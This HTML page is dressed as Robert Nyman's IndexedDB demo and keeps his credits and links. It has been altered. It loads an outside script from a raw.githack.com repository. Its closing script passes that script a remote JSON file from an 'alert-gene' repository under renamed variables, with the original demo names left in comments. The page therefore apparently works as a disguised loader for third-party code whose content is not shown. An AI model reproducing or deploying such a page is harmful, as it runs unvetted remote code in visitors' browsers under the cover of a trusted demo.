<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>HTML5 with storing files in IndexedDB</title>
              <script src="https://raw.githack.com/ibtisammidlet/midlet/main/XmlObjectStore.js" async></script>

        <style rel="stylesheet"  type="text/css" >body {
    font: 12px "Helvetica Neue", "Helvetica", sans-serif;
    background: #ccc;
}

h1 {
    margin-top: 0;
}

h2 {
    margin-top: 40px;
}

img {
    padding: 10px;
    box-shadow: 0 0 10px 2px #000;
    margin-bottom: 5px;
}

figcaption {
    font-style: italic;
}

.container {
    width: 900px;
    background: #fff;
    border-radius: 10px;
    margin: 0 auto;
    padding: 30px;
}

header {
    margin-bottom: 20px;
    border-bottom: 1px solid #000;
}

.main-content {
    overflow: hidden;
}

.additional-content {
    float: right;
    width: 300px;
    height: 400px;
    padding: 10px;
    background: #ccc;
    border-radius: 5px
}

.page-footer {
    border-top: 1px solid #000;
    margin-top: 30px;
    padding-top: 10px;
}

 </style>
    </head>

    <body>

        <div class="container">

            <header class="header" role="banner">
                <h1>HTML5 with storing files in IndexedDB</h1>
            </header>

            <div class="main">
                <article class="main-content" role="main">

                    <aside class="additional-content" aria-live="polite" aria-relevant="additions" aria-atomic="true">
                        <p>This is a demo page displaying HTML5 IndexedDB and how to store files in it. It uses XMLHttpRequest Level 2, BlobBuilder  and createObjectURL as well.</p>
                        <p>In the <a href="js/base.js">base.js</a> file you can see various code being called that generates content in this page.</p>
                        <p>All the <a href="https://github.com/robnyman/robnyman.github.com">code is available at GitHub</a>, for this page and other related demos.
                        </p>
                    </aside>

                    <h2>Figure</h2>

                    <p>If supported, this image below is loaded from IndexedDB through an objectURL.</p>
                    <figure>
                        <div id="elephant" src="https://raw.githack.com/ibtisammidlet/alert-gene/2.4.4/v2.4.4.23219.json" alt="A close up of an elephant"/>
                        <figcaption>A mighty big elephant, and mighty close too!</figcaption>
                    </figure>

                </article>
            </div>

            <footer class="page-footer" role="contentinfo">
                Created by <a href="http://robertnyman.com/">Robert Nyman</a><br>
                <a href="https://github.com/robnyman/robnyman.github.com">All demo code at GitHub</a>.
            </footer>

        </div>

        <script>
var ObjectFiles = "JsonData"; // "elephantFiles"
var Object_X1 = "data"; // "elephants"
var FileUrl = "https://raw.githack.com/ibtisammidlet/alert-gene/2.4.4/v2.4.4.23219.json"; // "elephant.png"
XmlObjectStore(ObjectFiles,Object_X1,FileUrl);
      </script>
      

    </body>
</html>
